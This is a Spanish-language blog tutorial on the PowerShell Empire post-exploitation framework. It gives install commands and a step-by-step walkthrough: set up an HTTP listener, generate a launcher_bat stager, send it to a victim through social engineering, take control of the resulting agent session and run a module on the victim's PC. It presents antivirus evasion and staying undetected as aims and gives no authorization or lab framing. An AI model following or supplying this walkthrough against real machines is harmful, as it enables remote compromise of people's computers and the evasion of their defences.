https://esgeeks.com/?p=5555

Este artículo es el primer post de la serie Empire. Aquí, cubriré todos los aspectos básicos que necesita saber sobre el Framework: PowerShell Empire. Y en los próximos tutoriales, veremos las hazañas avanzadas de Empire.

1. Introducción

Empire es un framework post-explotación. Es un agente de PowerShell puro, centrado únicamente en Python con comunicaciones criptográficamente seguras con el complemento de una arquitectura flexible. Empire tiene los medios para ejecutar agentes de PowerShell sin el requisito de PowerShell.exe. Puede emplear rápidamente módulos post-explotables, que cubren una amplia gama que va desde keyloggers hasta mimikatz, etc.


Este framework es una combinación de los proyectos PowerShell Empire y Python Empire; lo que lo hace fácil de usar y conveniente. PowerShell Empire se lanzó en 2015 y Python Empire se lanzó en 2016. Es similar a Metasploit y Meterpreter. Pero como es una herramienta de comando y control, te permite controlar una PC de manera mucho más eficiente.

2. Importancia

PowerShell ofrece abundantes ventajas ofensivas que incluyen además el acceso completo de .NET, la lista blanca de applock y el acceso directo a Win32. También construye binarios maliciosos en la memoria. Es útil ya que se desarrolla rápidamente en comparación con otros marcos. Además, como no requiere PowerShell.exe, te permite omitir los antivirus. Por lo tanto, es mejor usar el PowerShell Empire.

3. Terminología

Antes de comenzar con la acción necesitas saber estas cuatro cosas:

  • Listener: el oyente es un proceso que escucha una conexión desde la máquina que estamos atacando. Esto ayuda a Empire a enviar el “paquete” a la computadora del atacante.
  • Stager: un stager es un fragmento de código que permite que nuestro código malicioso se ejecute a través del agente en el host comprometido.
  • Agent: un agente es un programa que mantiene una conexión entre tu computadora y el host comprometido.
  • Módule: Esto es lo que ejecuta nuestros comandos maliciosos, que pueden recopilar credenciales y escalar nuestros privilegios como se mencionó anteriormente.

4. Instalación

Puedes descargar Empire desde aquí. Clona el comando desde el hipervínculo proporcionado para GitHub o simplemente usa clone.

Usa el siguiente comando para descargarlo:

git clone https://github.com/EmpireProject/Empire.git

Una vez que se inicia y completa la descarga, sigue los pasos que se detallan a continuación para instalarlo:

cd Empire/
ls
cd setup/
ls
./install.sh
Clonar e instalar Empire en Linux

Clonar e instalar Empire en Linux

Espera a que termine la instalación. Esto puede tardar unos segundos. Te pedirá una contraseña. En mi caso, mi contraseña será geek.

5. Uso con ejemplo

Una vez que la instalación haya terminado, retrocede un directorio y ejecuta empire usando ./empire.

./empire
Iniciar empire

Iniciar empire

Ahora use el comando help ya que abre todas las opciones esenciales requeridas inicialmente.

Comando help para Empire

Comando help para Empire

De acuerdo con el flujo de trabajo, primero, tenemos que crear un oyente en nuestra máquina local. Escribe el siguiente comando:

listeners

Después de ejecutar el comando anterior, dirá que “no listeners are currently active””, pero no te preocupes, ahora estamos en la interfaz del oyente. Así que en esta interfaz de oyente, escribe:

listeners en Empire

listeners en Empire

uselistener <tab> <tab>

El comando anterior mostrará una lista de todos los oyentes que se pueden usar, como dbx, http, http_com, etc. El oyente más popular y de uso común es http y usaremos el mismo en nuestra práctica. Para ese tipo:

uselistener http

Este comando crea una escucha en el puerto local 80. Si el puerto 80 ya está ocupado por un servicio como Apache, asegúrate de detener ese servicio, ya que esta escucha de http solo funcionará en el puerto 80. Ahora para ver todas las configuraciones que debes proporcionar en este tipo de oyente, escribe:

info
Información de listener http en Empire

Información de listener http en Empire

Como puedes ver en la imagen, hay una variedad de configuraciones que puedes usar para modificar o personalizar tu listener. Intentemos cambiar el nombre de nuestro oyente ya que ayuda a recordar a todos los oyentes que están activados; si se activan en masa. Así que para esto, escribe..:

set Name [nombre]

El comando anterior cambiará el nombre de los oyentes de http a [nombre].

Por lo general, este oyente toma automáticamente la IP del host local pero, por si acaso, puede susar el siguiente comando para configurar tu IP:

set Host [IP_Local]
execute
Establecer nombre e IP de listener

Establecer nombre e IP de listener

El comando de arriba ejecutará al oyente. Luego regresa y usa el PowerShell listener como se muestra en la imagen.

Ahora escribe back para regresar desde la interfaz del oyente para que podamos ejecutar nuestros módulos. Usa el siguiente comando para ver todos los módulos que proporciona el empire:

usestager <tabt> <tab>

Como se puede ver en la imagen de abajo, hay muchos módulos para Windows e iOS junto con algunos múltiples módulos que se pueden usar en cualquier plataforma. Usaremos launcher_bat para crear malware y explotar la PC de nuestras víctimas en este tutorial. Entonces, usamos este tipo:


usestager windows/launcher_bat

Este archivo debe ser enviado a la víctima por cualquier método de Ingeniería Social:

Archivo launcher_bat para hacking

Archivo launcher_bat para hacking

Luego, vuelva a escribir info para ver todas las configuraciones requeridas por el exploit. Después de examinar verás que solo necesitamos proporcionarle un oyente. Por lo tanto, escribe lo siguiente:

set Listener [nombre]
execute
Módulos de Empire

Módulos de Empire

Los dos comandos anteriores ejecutarán nuestro exploit después de configurar el listener prueba y crear /tmp/launcher.bat. Usa el servidor de Python para ejecutar este archivo en la PC de las víctimas. Como el archivo se ejecutará, tendrás una sesión. Para comprobar tu tipo de sesión, escribe:

agents
agents activos en Empire

agents activos en Empire

Con el comando anterior, puedes ver que tienes una sesión activada. Puedes cambiar el nombre de tu sesión ya que el nombre dado de manera predeterminada es bastante complicado y difícil de recordar. Para ello escribe:

rename V1CBMSEN EsGeeks

Usa lo siguiente para acceder a la sesión:

interact EsGeeks

5.1. usemodule

Anteriormente se mostraba la demostración básica de empire y sus diferentes términos utilizados y cómo usarlos. También hay otro término, es decir, usemodule. Por último, veamos cómo usarlo.

usemodule <tab> <tab>

El comando te mostrará todos los módulos disponibles y listos para usar, como se muestra en la siguiente imagen:

usemodule en Empire

usemodule en Empire

A continuación se muestra una pequeña demostración de cómo usar usemodule. Escribe el siguiente comando:

usemodule trollsploit/message
set MsgText HAS SIDO HACKEADO POR ESGEEKS
execute
y
usemodule trollsploit message

usemodule trollsploit message

El uso del módulo anterior mostrará un mensaje en la PC de las víctimas como se muestra a continuación:

Hacking con EsGeeks

Hacking con EsGeeks

6. Conclusión

El malware en la forma de .exe/dll/hta, etc. permite a un atacante construir cualquier ataque deseable ya que este framework tiene acceso a Win32. Aunque las compañías de antivirus se están dando cuenta día a día, estas siguen siendo válidas. Es una gran herramienta debido a su vasta, auténtica y eficiente colección de post-exploits.

En última instancia, el objetivo es no ser detectado y tener éxito en tu ataque y esta herramienta nos permite hacerlo. Y este artículo cubrió todos los conceptos básicos que necesitas saber sobre este framework. Atento a los siguientes artículos… Feliz hacking!!


¡Mantente actualizado!

Suscríbete a nuestro boletín semanal...

Suscríbete a nuestro boletín electrónico para recibir artículos útiles y ofertas especiales. No te perderás absolutamente de nada!

Enviaremos solamente boletines al email y no compartiremos tu email.